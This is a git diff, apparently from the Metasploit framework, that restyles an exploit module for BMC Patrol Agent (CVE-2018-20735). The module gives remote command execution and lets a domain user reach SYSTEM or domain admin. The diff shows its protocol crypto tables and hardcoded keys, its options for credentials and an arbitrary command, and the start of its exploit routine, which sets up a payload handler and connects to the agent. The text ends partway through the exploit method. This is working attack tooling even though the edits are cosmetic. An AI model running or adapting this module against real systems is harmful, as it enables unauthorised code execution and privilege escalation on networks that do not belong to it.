diff --git a/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb b/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb index aa63ba38f6..bd164b1c56 100644 --- a/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb +++ b/modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb @@ -9,135 +9,140 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell - @deflater = $nil - @inflater = $nil + @deflater = nil + @inflater = nil + + SBOXES = [ + 0x20022000, 0x20000000, 0x0, 0x20022000, 0x0, 0x20022000, 0x20000000, 0x0, 0x20022000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x0, 0x20000000, 0x20000000, 0x0, + 0x22000, 0x20022000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x0, 0x22000, + 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x0, 0x0, 0x20022000, 0x22000, + 0x20000000, 0x20022000, 0x20000000, 0x22000, 0x22000, 0x20000000, 0x22000, + 0x20022000, 0x0, 0x20022000, 0x0, 0x0, 0x20000000, 0x20022000, 0x20022000, 0x20000000, + 0x22000, 0x0, 0x22000, 0x20000000, 0x0, 0x20000000, 0x0, 0x22000, 0x20022000, 0x0, + 0x20000000, 0x22000, 0x20022000, 0x802, 0x2, 0x8000800, 0x8000802, 0x800, 0x8000002, + 0x8000002, 0x8000800, 0x8000002, 0x802, 0x802, 0x8000000, 0x8000800, 0x800, + 0x0, 0x8000002, 0x2, 0x8000000, 0x800, 0x2, 0x8000802, 0x802, 0x8000000, 0x800, 0x8000000, + 0x0, 0x2, 0x8000802, 0x0, 0x8000800, 0x8000802, 0x0, 0x0, 0x8000802, 0x800, 0x8000002, + 0x802, 0x2, 0x8000000, 0x800, 0x8000802, 0x0, 0x2, 0x8000800, 0x8000002, 0x8000000, + 0x8000800, 0x802, 0x8000802, 0x2, 0x802, 0x8000800, 0x800, 0x8000000, 0x8000002, + 0x0, 0x2, 0x800, 0x8000800, 0x802, 0x8000000, 0x8000802, 0x0, 0x8000002, 0x2200004, + 0x0, 0x2200000, 0x0, 0x4, 0x2200004, 0x2200000, 0x2200000, 0x2200000, 0x4, 0x4, 0x2200000, + 0x4, 0x2200000, 0x0, 0x4, 0x0, 0x2200004, 0x4, 0x2200000, 0x2200004, 0x0, 0x0, 0x4, 0x2200004, + 0x2200004, 0x2200000, 0x4, 0x0, 0x0, 0x2200004, 0x2200004, 0x4, 0x2200000, 0x2200000, + 0x2200004, 0x2200004, 0x4, 0x4, 0x0, 0x0, 0x2200004, 0x0, 0x4, 0x2200000, 0x0, 0x2200004, + 0x2200004, 0x2200000, 0x2200000, 0x0, 0x4, 0x4, 0x2200004, 0x2200000, 0x0, 0x4, 0x0, + 0x2200004, 0x2200000, 0x2200004, 0x4, 0x0, 0x2200000, 0x1100004, 0x0, 0x4, 0x1100004, + 0x1100000, 0x0, 0x1100000, 0x4, 0x0, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100004, 0x1100004, + 0x0, 0x4, 0x1100000, 0x1100004, 0x0, 0x4, 0x1100000, 0x0, 0x4, 0x1100000, 0x4, 0x1100004, + 0x1100000, 0x1100000, 0x4, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100000, 0x4, 0x1100004, + 0x4, 0x1100000, 0x0, 0x1100000, 0x0, 0x4, 0x1100004, 0x0, 0x1100000, 0x4, 0x1100000, + 0x1100004, 0x0, 0x0, 0x1100000, 0x0, 0x1100004, 0x4, 0x1100004, 0x1100004, 0x4, 0x0, + 0x1100000, 0x1100000, 0x0, 0x1100004, 0x4, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x0, 0x400, 0x10000400, 0x400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x400, + 0x0, 0x10000000, 0x0, 0x10000000, 0x10000400, 0x400, 0x400, 0x10000400, 0x10000000, + 0x0, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x10000400, 0x0, 0x0, 0x10000400, + 0x10000400, 0x400, 0x0, 0x10000000, 0x400, 0x10000000, 0x10000000, 0x400, 0x0, + 0x10000400, 0x10000400, 0x10000000, 0x10000000, 0x0, 0x10000400, 0x0, 0x10000400, + 0x0, 0x0, 0x10000400, 0x10000000, 0x400, 0x400, 0x10000400, 0x400, 0x0, 0x10000000, + 0x400, 0x0, 0x10000400, 0x400, 0x10000000, 0x4011000, 0x11001, 0x0, 0x4011000, + 0x4000001, 0x11000, 0x4011000, 0x1, 0x11000, 0x1, 0x11001, 0x4000000, 0x4011001, + 0x4000000, 0x4000000, 0x4011001, 0x0, 0x4000001, 0x11001, 0x0, 0x4000000, 0x4011001, + 0x1, 0x4011000, 0x4011001, 0x11000, 0x4000001, 0x11001, 0x1, 0x0, 0x11000, 0x4000001, + 0x11001, 0x0, 0x4000000, 0x1, 0x4000000, 0x4000001, 0x11001, 0x4011000, 0x0, 0x11001, + 0x1, 0x4011001, 0x4000001, 0x11000, 0x4011001, 0x4000000, 0x4000001, 0x4011000, + 0x11000, 0x4011001, 0x1, 0x11000, 0x4011000, 0x1, 0x11000, 0x0, 0x4011001, 0x4000000, + 0x4011000, 0x4000001, 0x0, 0x11001, 0x40002, 0x40000, 0x2, 0x40002, 0x0, 0x0, 0x40002, + 0x2, 0x40000, 0x2, 0x0, 0x40002, 0x2, 0x40002, 0x0, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40000, + 0x40002, 0x0, 0x40000, 0x40002, 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x40002, 0x0, 0x2, 0x40002, + 0x0, 0x2, 0x40000, 0x40000, 0x2, 0x0, 0x40002, 0x0, 0x40000, 0x2, 0x0, 0x2, 0x40000, 0x40000, + 0x0, 0x40002, 0x40002, 0x0, 0x40002, 0x2, 0x40000, 0x40002, 0x2, 0x40000, 0x0, 0x40002, + 0x40002, 0x0, 0x2, 0x40000, 0x20000110, 0x40000, 0x20000000, 0x20040110, 0x0, 0x40110, + 0x20040000, 0x20000110, 0x40110, 0x20040000, 0x40000, 0x20000000, 0x20040000, + 0x20000110, 0x110, 0x40000, 0x20040110, 0x110, 0x0, 0x20000000, 0x110, 0x20040000, + 0x40110, 0x0, 0x20000000, 0x0, 0x20000110, 0x40110, 0x40000, 0x20040110, 0x20040110, + 0x110, 0x20040110, 0x20000000, 0x110, 0x20040000, 0x110, 0x40000, 0x20000000, + 0x40110, 0x20040000, 0x0, 0x0, 0x20000110, 0x0, 0x20040110, 0x40110, 0x0, 0x40000, + 0x20040110, 0x20000110, 0x110, 0x20040110, 0x20000000, 0x40000, 0x20000110, + 0x20000110, 0x110, 0x40110, 0x20040000, 0x20000000, 0x40000, 0x20040000, 0x40110, + 0x0, 0x4000000, 0x11000, 0x4011008, 0x4000008, 0x11000, 0x4011008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x4011000, 0x11008, 0x4000008, 0x4011000, 0x0, 0x4011000, 0x0, + 0x4000008, 0x11008, 0x11000, 0x4011008, 0x0, 0x8, 0x8, 0x11008, 0x4011008, 0x4000008, + 0x4000000, 0x11000, 0x11008, 0x4011000, 0x4011000, 0x11008, 0x4000008, 0x4000000, + 0x4000000, 0x8, 0x8, 0x11000, 0x0, 0x4011000, 0x4011008, 0x0, 0x4011008, 0x0, 0x11000, + 0x4000008, 0x11008, 0x11000, 0x0, 0x4011008, 0x4000008, 0x4011000, 0x11008, 0x4000000, + 0x4011000, 0x4000008, 0x11000, 0x11008, 0x8, 0x4011008, 0x4000000, 0x8, 0x22000, + 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x22000, 0x22000, + 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x0, 0x0, 0x22000, 0x22000, + 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x0, 0x0, 0x0, 0x22000, 0x22000, 0x110, 0x110, + 0x0, 0x80000, 0x110, 0x80000, 0x80110, 0x0, 0x80110, 0x80110, 0x80000, 0x0, 0x80000, + 0x110, 0x0, 0x80110, 0x0, 0x80110, 0x110, 0x0, 0x80000, 0x110, 0x80000, 0x110, 0x80110, + 0x0, 0x0, 0x80110, 0x110, 0x80000, 0x80110, 0x80000, 0x80110, 0x0, 0x80000, 0x80110, + 0x80000, 0x110, 0x0, 0x80000, 0x0, 0x80000, 0x110, 0x0, 0x110, 0x80110, 0x80000, 0x110, + 0x80110, 0x80000, 0x0, 0x80110, 0x110, 0x0, 0x80110, 0x0, 0x80000, 0x110, 0x80110, + 0x80000, 0x0, 0x80110, 0x110, 0x110, 0x2200000, 0x8, 0x0, 0x2200008, 0x8, 0x0, 0x2200000, + 0x8, 0x0, 0x2200008, 0x8, 0x2200000, 0x2200000, 0x2200000, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200008, 0x0, 0x0, 0x0, 0x2200008, 0x2200008, 0x2200008, 0x2200008, 0x2200000, + 0x0, 0x0, 0x8, 0x8, 0x2200000, 0x0, 0x2200000, 0x2200000, 0x8, 0x2200008, 0x8, 0x0, 0x2200000, + 0x2200000, 0x0, 0x2200008, 0x8, 0x8, 0x2200008, 0x8, 0x0, 0x2200008, 0x8, 0x8, 0x2200000, + 0x2200000, 0x2200008, 0x8, 0x0, 0x0, 0x2200000, 0x2200000, 0x2200008, 0x2200008, + 0x0, 0x0, 0x2200008, 0x1100000, 0x800, 0x800, 0x1, 0x1100801, 0x1100001, 0x1100800, + 0x0, 0x0, 0x801, 0x801, 0x1100000, 0x1, 0x1100800, 0x1100000, 0x801, 0x801, 0x1100000, + 0x1100001, 0x1100801, 0x0, 0x800, 0x1, 0x1100800, 0x1100001, 0x1100801, 0x1100800, + 0x1, 0x1100801, 0x1100001, 0x800, 0x0, 0x1100801, 0x1100000, 0x1100001, 0x801, + 0x1100000, 0x800, 0x0, 0x1100001, 0x801, 0x1100801, 0x1100800, 0x0, 0x800, 0x1, 0x1, + 0x800, 0x0, 0x801, 0x800, 0x1100800, 0x801, 0x1100000, 0x1100801, 0x0, 0x1100800, + 0x1, 0x1100001, 0x1100801, 0x1, 0x1100800, 0x1100000, 0x1100001, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, 0x10000400, 0x10000000, 0x400, + 0x10000000, 0x400, 0x400, 0x10000000, 0x10000400, 0x0, 0x10000000, 0x10000400, + 0x0, 0x400, 0x10000400, 0x0, 0x10000400, 0x10000000, 0x400, 0x10000000, 0x10000000, + 0x10000400, 0x0, 0x400, 0x10000000, 0x400, 0x10000400, 0x10000000, 0x0, 0x0, 0x400, + 0x10000400, 0x10000400, 0x10000000, 0x0, 0x0, 0x0, 0x10000400, 0x10000000, 0x400, + 0x0, 0x10000400, 0x400, 0x0, 0x10000000, 0x0, 0x10000400, 0x400, 0x400, 0x10000000, + 0x10000000, 0x10000400, 0x10000400, 0x400, 0x400, 0x10000000, 0x220, 0x8000000, + 0x8000220, 0x0, 0x8000000, 0x220, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, + 0x8000220, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000220, 0x220, 0x8000000, 0x8000220, + 0x220, 0x0, 0x8000000, 0x0, 0x0, 0x8000220, 0x220, 0x0, 0x8000000, 0x8000000, 0x220, + 0x0, 0x8000000, 0x220, 0x8000220, 0x8000220, 0x0, 0x0, 0x8000000, 0x220, 0x8000220, + 0x8000000, 0x220, 0x8000000, 0x220, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x8000220, 0x0, 0x220, 0x8000000, 0x8000220, 0x0, 0x0, 0x220, + 0x8000000, 0x8000220, 0x80220, 0x80220, 0x0, 0x0, 0x80000, 0x220, 0x80220, 0x80220, + 0x0, 0x80000, 0x220, 0x0, 0x220, 0x80000, 0x80000, 0x80220, 0x0, 0x220, 0x220, 0x80000, + 0x80220, 0x80000, 0x0, 0x220, 0x80000, 0x220, 0x80000, 0x80220, 0x220, 0x0, 0x80220, + 0x0, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x80000, 0x0, 0x220, 0x80220, 0x80000, 0x80000, + 0x220, 0x80220, 0x0, 0x220, 0x80000, 0x80220, 0x220, 0x80220, 0x80000, 0x220, 0x0, + 0x80000, 0x80220, 0x0, 0x80220, 0x220, 0x0, 0x80000, 0x80220, 0x0, 0x220 + ].freeze - SBOXES = [ 0x20022000,0x20000000,0x0,0x20022000,0x0,0x20022000,0x20000000,0x0,0x20022000, - 0x20022000,0x20000000,0x22000,0x22000,0x0,0x0,0x20000000,0x20000000,0x0, - 0x22000,0x20022000,0x20022000,0x20000000,0x22000,0x22000,0x0,0x22000, - 0x20022000,0x20000000,0x22000,0x22000,0x20000000,0x0,0x0,0x20022000,0x22000, - 0x20000000,0x20022000,0x20000000,0x22000,0x22000,0x20000000,0x22000, - 0x20022000,0x0,0x20022000,0x0,0x0,0x20000000,0x20022000,0x20022000,0x20000000, - 0x22000,0x0,0x22000,0x20000000,0x0,0x20000000,0x0,0x22000,0x20022000,0x0, - 0x20000000,0x22000,0x20022000,0x802,0x2,0x8000800,0x8000802,0x800,0x8000002, - 0x8000002,0x8000800,0x8000002,0x802,0x802,0x8000000,0x8000800,0x800, - 0x0,0x8000002,0x2,0x8000000,0x800,0x2,0x8000802,0x802,0x8000000,0x800,0x8000000, - 0x0,0x2,0x8000802,0x0,0x8000800,0x8000802,0x0,0x0,0x8000802,0x800,0x8000002, - 0x802,0x2,0x8000000,0x800,0x8000802,0x0,0x2,0x8000800,0x8000002,0x8000000, - 0x8000800,0x802,0x8000802,0x2,0x802,0x8000800,0x800,0x8000000,0x8000002, - 0x0,0x2,0x800,0x8000800,0x802,0x8000000,0x8000802,0x0,0x8000002,0x2200004, - 0x0,0x2200000,0x0,0x4,0x2200004,0x2200000,0x2200000,0x2200000,0x4,0x4,0x2200000, - 0x4,0x2200000,0x0,0x4,0x0,0x2200004,0x4,0x2200000,0x2200004,0x0,0x0,0x4,0x2200004, - 0x2200004,0x2200000,0x4,0x0,0x0,0x2200004,0x2200004,0x4,0x2200000,0x2200000, - 0x2200004,0x2200004,0x4,0x4,0x0,0x0,0x2200004,0x0,0x4,0x2200000,0x0,0x2200004, - 0x2200004,0x2200000,0x2200000,0x0,0x4,0x4,0x2200004,0x2200000,0x0,0x4,0x0, - 0x2200004,0x2200000,0x2200004,0x4,0x0,0x2200000,0x1100004,0x0,0x4,0x1100004, - 0x1100000,0x0,0x1100000,0x4,0x0,0x1100004,0x0,0x1100000,0x4,0x1100004,0x1100004, - 0x0,0x4,0x1100000,0x1100004,0x0,0x4,0x1100000,0x0,0x4,0x1100000,0x4,0x1100004, - 0x1100000,0x1100000,0x4,0x0,0x1100004,0x4,0x1100004,0x1100000,0x4,0x1100004, - 0x4,0x1100000,0x0,0x1100000,0x0,0x4,0x1100004,0x0,0x1100000,0x4,0x1100000, - 0x1100004,0x0,0x0,0x1100000,0x0,0x1100004,0x4,0x1100004,0x1100004,0x4,0x0, - 0x1100000,0x1100000,0x0,0x1100004,0x4,0x0,0x10000400,0x400,0x400,0x10000000, - 0x0,0x400,0x10000400,0x400,0x10000000,0x10000000,0x0,0x10000400,0x400, - 0x0,0x10000000,0x0,0x10000000,0x10000400,0x400,0x400,0x10000400,0x10000000, - 0x0,0x10000000,0x400,0x10000400,0x10000000,0x10000400,0x0,0x0,0x10000400, - 0x10000400,0x400,0x0,0x10000000,0x400,0x10000000,0x10000000,0x400,0x0, - 0x10000400,0x10000400,0x10000000,0x10000000,0x0,0x10000400,0x0,0x10000400, - 0x0,0x0,0x10000400,0x10000000,0x400,0x400,0x10000400,0x400,0x0,0x10000000, - 0x400,0x0,0x10000400,0x400,0x10000000,0x4011000,0x11001,0x0,0x4011000, - 0x4000001,0x11000,0x4011000,0x1,0x11000,0x1,0x11001,0x4000000,0x4011001, - 0x4000000,0x4000000,0x4011001,0x0,0x4000001,0x11001,0x0,0x4000000,0x4011001, - 0x1,0x4011000,0x4011001,0x11000,0x4000001,0x11001,0x1,0x0,0x11000,0x4000001, - 0x11001,0x0,0x4000000,0x1,0x4000000,0x4000001,0x11001,0x4011000,0x0,0x11001, - 0x1,0x4011001,0x4000001,0x11000,0x4011001,0x4000000,0x4000001,0x4011000, - 0x11000,0x4011001,0x1,0x11000,0x4011000,0x1,0x11000,0x0,0x4011001,0x4000000, - 0x4011000,0x4000001,0x0,0x11001,0x40002,0x40000,0x2,0x40002,0x0,0x0,0x40002, - 0x2,0x40000,0x2,0x0,0x40002,0x2,0x40002,0x0,0x0,0x2,0x40000,0x40000,0x2,0x40000, - 0x40002,0x0,0x40000,0x40002,0x0,0x2,0x40000,0x40000,0x2,0x40002,0x0,0x2,0x40002, - 0x0,0x2,0x40000,0x40000,0x2,0x0,0x40002,0x0,0x40000,0x2,0x0,0x2,0x40000,0x40000, - 0x0,0x40002,0x40002,0x0,0x40002,0x2,0x40000,0x40002,0x2,0x40000,0x0,0x40002, - 0x40002,0x0,0x2,0x40000,0x20000110,0x40000,0x20000000,0x20040110,0x0,0x40110, - 0x20040000,0x20000110,0x40110,0x20040000,0x40000,0x20000000,0x20040000, - 0x20000110,0x110,0x40000,0x20040110,0x110,0x0,0x20000000,0x110,0x20040000, - 0x40110,0x0,0x20000000,0x0,0x20000110,0x40110,0x40000,0x20040110,0x20040110, - 0x110,0x20040110,0x20000000,0x110,0x20040000,0x110,0x40000,0x20000000, - 0x40110,0x20040000,0x0,0x0,0x20000110,0x0,0x20040110,0x40110,0x0,0x40000, - 0x20040110,0x20000110,0x110,0x20040110,0x20000000,0x40000,0x20000110, - 0x20000110,0x110,0x40110,0x20040000,0x20000000,0x40000,0x20040000,0x40110, - 0x0,0x4000000,0x11000,0x4011008,0x4000008,0x11000,0x4011008,0x4000000, - 0x4000000,0x8,0x8,0x4011000,0x11008,0x4000008,0x4011000,0x0,0x4011000,0x0, - 0x4000008,0x11008,0x11000,0x4011008,0x0,0x8,0x8,0x11008,0x4011008,0x4000008, - 0x4000000,0x11000,0x11008,0x4011000,0x4011000,0x11008,0x4000008,0x4000000, - 0x4000000,0x8,0x8,0x11000,0x0,0x4011000,0x4011008,0x0,0x4011008,0x0,0x11000, - 0x4000008,0x11008,0x11000,0x0,0x4011008,0x4000008,0x4011000,0x11008,0x4000000, - 0x4011000,0x4000008,0x11000,0x11008,0x8,0x4011008,0x4000000,0x8,0x22000, - 0x0,0x0,0x22000,0x22000,0x22000,0x0,0x22000,0x0,0x0,0x22000,0x0,0x22000,0x22000, - 0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x22000,0x22000, - 0x0,0x22000,0x0,0x0,0x22000,0x22000,0x22000,0x0,0x22000,0x0,0x0,0x22000,0x22000, - 0x22000,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x0,0x0,0x22000,0x22000, - 0x22000,0x0,0x0,0x0,0x22000,0x22000,0x0,0x0,0x0,0x22000,0x22000,0x110,0x110, - 0x0,0x80000,0x110,0x80000,0x80110,0x0,0x80110,0x80110,0x80000,0x0,0x80000, - 0x110,0x0,0x80110,0x0,0x80110,0x110,0x0,0x80000,0x110,0x80000,0x110,0x80110, - 0x0,0x0,0x80110,0x110,0x80000,0x80110,0x80000,0x80110,0x0,0x80000,0x80110, - 0x80000,0x110,0x0,0x80000,0x0,0x80000,0x110,0x0,0x110,0x80110,0x80000,0x110, - 0x80110,0x80000,0x0,0x80110,0x110,0x0,0x80110,0x0,0x80000,0x110,0x80110, - 0x80000,0x0,0x80110,0x110,0x110,0x2200000,0x8,0x0,0x2200008,0x8,0x0,0x2200000, - 0x8,0x0,0x2200008,0x8,0x2200000,0x2200000,0x2200000,0x2200008,0x8,0x8,0x2200000, - 0x2200008,0x0,0x0,0x0,0x2200008,0x2200008,0x2200008,0x2200008,0x2200000, - 0x0,0x0,0x8,0x8,0x2200000,0x0,0x2200000,0x2200000,0x8,0x2200008,0x8,0x0,0x2200000, - 0x2200000,0x0,0x2200008,0x8,0x8,0x2200008,0x8,0x0,0x2200008,0x8,0x8,0x2200000, - 0x2200000,0x2200008,0x8,0x0,0x0,0x2200000,0x2200000,0x2200008,0x2200008, - 0x0,0x0,0x2200008,0x1100000,0x800,0x800,0x1,0x1100801,0x1100001,0x1100800, - 0x0,0x0,0x801,0x801,0x1100000,0x1,0x1100800,0x1100000,0x801,0x801,0x1100000, - 0x1100001,0x1100801,0x0,0x800,0x1,0x1100800,0x1100001,0x1100801,0x1100800, - 0x1,0x1100801,0x1100001,0x800,0x0,0x1100801,0x1100000,0x1100001,0x801, - 0x1100000,0x800,0x0,0x1100001,0x801,0x1100801,0x1100800,0x0,0x800,0x1,0x1, - 0x800,0x0,0x801,0x800,0x1100800,0x801,0x1100000,0x1100801,0x0,0x1100800, - 0x1,0x1100001,0x1100801,0x1,0x1100800,0x1100000,0x1100001,0x0,0x0,0x400, - 0x10000400,0x10000400,0x10000000,0x0,0x0,0x400,0x10000400,0x10000000,0x400, - 0x10000000,0x400,0x400,0x10000000,0x10000400,0x0,0x10000000,0x10000400, - 0x0,0x400,0x10000400,0x0,0x10000400,0x10000000,0x400,0x10000000,0x10000000, - 0x10000400,0x0,0x400,0x10000000,0x400,0x10000400,0x10000000,0x0,0x0,0x400, - 0x10000400,0x10000400,0x10000000,0x0,0x0,0x0,0x10000400,0x10000000,0x400, - 0x0,0x10000400,0x400,0x0,0x10000000,0x0,0x10000400,0x400,0x400,0x10000000, - 0x10000000,0x10000400,0x10000400,0x400,0x400,0x10000000,0x220,0x8000000, - 0x8000220,0x0,0x8000000,0x220,0x0,0x8000220,0x220,0x0,0x8000000,0x8000220, - 0x8000220,0x8000220,0x220,0x0,0x8000000,0x8000220,0x220,0x8000000,0x8000220, - 0x220,0x0,0x8000000,0x0,0x0,0x8000220,0x220,0x0,0x8000000,0x8000000,0x220, - 0x0,0x8000000,0x220,0x8000220,0x8000220,0x0,0x0,0x8000000,0x220,0x8000220, - 0x8000000,0x220,0x8000000,0x220,0x220,0x8000000,0x8000220,0x0,0x0,0x220, - 0x8000000,0x8000220,0x8000220,0x0,0x220,0x8000000,0x8000220,0x0,0x0,0x220, - 0x8000000,0x8000220,0x80220,0x80220,0x0,0x0,0x80000,0x220,0x80220,0x80220, - 0x0,0x80000,0x220,0x0,0x220,0x80000,0x80000,0x80220,0x0,0x220,0x220,0x80000, - 0x80220,0x80000,0x0,0x220,0x80000,0x220,0x80000,0x80220,0x220,0x0,0x80220, - 0x0,0x220,0x0,0x80000,0x80220,0x0,0x80000,0x0,0x220,0x80220,0x80000,0x80000, - 0x220,0x80220,0x0,0x220,0x80000,0x80220,0x220,0x80220,0x80000,0x220,0x0, - 0x80000,0x80220,0x0,0x80220,0x220,0x0,0x80000,0x80220,0x0,0x220] PC1 = "\x38\x30\x28\x20\x18\x10\x8\x0\x39\x31\x29\x21\x19\x11\x9"\ "\x1\x3A\x32\x2A\x22\x1A\x12\x0A\x2\x3B\x33\x2B\x23\x3E\x36"\ "\x2E\x26\x1E\x16\x0E\x6\x3D\x35\x2D\x25\x1D\x15\x0D\x5\x3C"\ - "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0" + "\x34\x2C\x24\x1C\x14\x0C\x4\x1B\x13\x0B\x3\x0\x0\x0\x0\x0\x0\x0\x0".freeze + PC2 = "\x0D\x10\x0A\x17\x0\x4\x2\x1B\x0E\x5\x14\x9\x16\x12\x0B\x3"\ "\x19\x7\x0F\x6\x1A\x13\x0C\x1\x28\x33\x1E\x24\x2E\x36\x1D"\ "\x27\x32\x2C\x20\x2F\x2B\x30\x26\x37\x21\x34\x2D\x29\x31"\ - "\x23\x1C\x1F" - SBOX_BYTE_ORDER = [ 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, - 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, - 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, - 0x40000000, 0x80000000 ] + "\x23\x1C\x1F".freeze - ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1" - INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e" - INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8" - #@des_keysch_0 = $nil - #@des_keysch_1 = $nil + SBOX_BYTE_ORDER = [ + 1, 2, 4, 8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, + 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, + 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, + 0x40000000, 0x80000000 + ].freeze + + ROTATIONS = "\x1\x1\x2\x2\x2\x2\x2\x2\x1\x2\x2\x2\x2\x2\x2\x1".freeze + INIT_DES_KEY_0 = "\x9a\xd3\xbc\x24\x10\xe2\x8f\x0e".freeze + INIT_DES_KEY_1 = "\xe2\x95\x14\x33\x59\xc3\xec\xa8".freeze DES_ENCRYPT = 0 - def initialize(info={}) + def initialize(info = {}) super(update_info(info, 'Name' => 'BMC Patrol Agent Privilege Escalation Cmd Execution', - 'Description' => %q{ + 'Description' => %q( This module leverages the remote command execution feature provided by the BMC Patrol Agent software. It can also be used to escalate privileges on Windows hosts as the software runs as SYSTEM but only verfies that the password @@ -146,19 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses powershell to execute the payload. The powershell version tends to timeout on the first run so it may take multiple tries. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ - 'b0yd', # @rwincey / Vulnerability Discovery and MSF module author + 'b0yd' # @rwincey / Vulnerability Discovery and MSF module author ], 'References' => [ ['CVE', '2018-20735'], ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/'] ], - 'Platform' => ['win','linux'], - 'Targets' => + 'Platform' => ['win', 'linux'], + 'Targets' => [ [ 'Windows Powershell Injected Shellcode', { @@ -175,18 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'DefaultTarget' => 0, 'DefaultOptions' => { - 'DisablePayloadHandler' => true, + 'DisablePayloadHandler' => true }, 'DisclosureDate' => 'Jan 17 2019')) - register_options([ + register_options( + [ Opt::RPORT(3181), - OptString.new('USER', [ true, 'local or domain user to authenticate with patrol', 'patrol' ]), - OptString.new('PASSWORD', [ true, 'password to authenticate with patrol', 'password' ]), - OptString.new('CMD', [ false, 'command to run on the target. If this option is specified the payload will be ignored.' ]) - ]) + OptString.new('USER', [true, 'local or domain user to authenticate with patrol', 'patrol']), + OptString.new('PASSWORD', [true, 'password to authenticate with patrol', 'password']), + OptString.new('CMD', [false, 'command to run on the target. If this option is specified the payload will be ignored.']) + ] + ) - end + end def cleanup disconnect @@ -196,12 +203,12 @@ class MetasploitModule < Msf::Exploit::Remote super end - def get_target_os( srv_info_msg ) + def get_target_os(srv_info_msg) lines = srv_info_msg.split("\n") - fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}" + fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}" - os = $nil - ver = $nil + os = nil + ver = nil lines[2..-2].each do |i| val = i.split("=") if val.length == 2 @@ -212,62 +219,62 @@ class MetasploitModule < Msf::Exploit::Remote end end end - [os,ver] + [os, ver] end - def get_cmd_output( cmd_output_msg ) + def get_cmd_output(cmd_output_msg) lines = cmd_output_msg.split("\n") - fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}" + fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}" - #Parse out command results + # Parse out command results idx_start = cmd_output_msg.index("Result\x00") idx_end = cmd_output_msg.index("RemPsl_user") - output = cmd_output_msg[idx_start+7..idx_end-1] + output = cmd_output_msg[idx_start + 7..idx_end - 1] output end def exploit - #Manually start the handler if not running a single command - if datastore['CMD'] == $nil or datastore['CMD'].empty? + # Manually start the handler if not running a single command + if datastore['CMD'].nil? || datastore['CMD'].empty? - #Set to nil if the cmd is empty for checks further down - datastore['CMD'] = $nil + # Set to nil if the cmd is empty for checks further down + datastore['CMD'] = nil datastore['DisablePayloadHandler'] = false - #Configure the payload handler + # Configure the payload handler payload_instance.exploit_config = { 'active_timeout' => 300 } - #Setup the payload handler + # Setup the payload handler payload_instance.setup_handler - #Start the payload handler + # Start the payload handler payload_instance.start_handler end - #Initialize zlib objects + # Initialize zlib objects @deflater = Zlib::Deflate.new(4, 15, Zlib::MAX_MEM_LEVEL, Zlib::DEFAULT_STRATEGY) - @inflater = Zlib::Inflate.new() + @inflater = Zlib::Inflate.new - #Connect to the BMC Patrol Agent + # Connect to the BMC Patrol Agent connect print_status("Connected to BMC Patrol Agent.") - #Create session msg + # Create session msg create_session 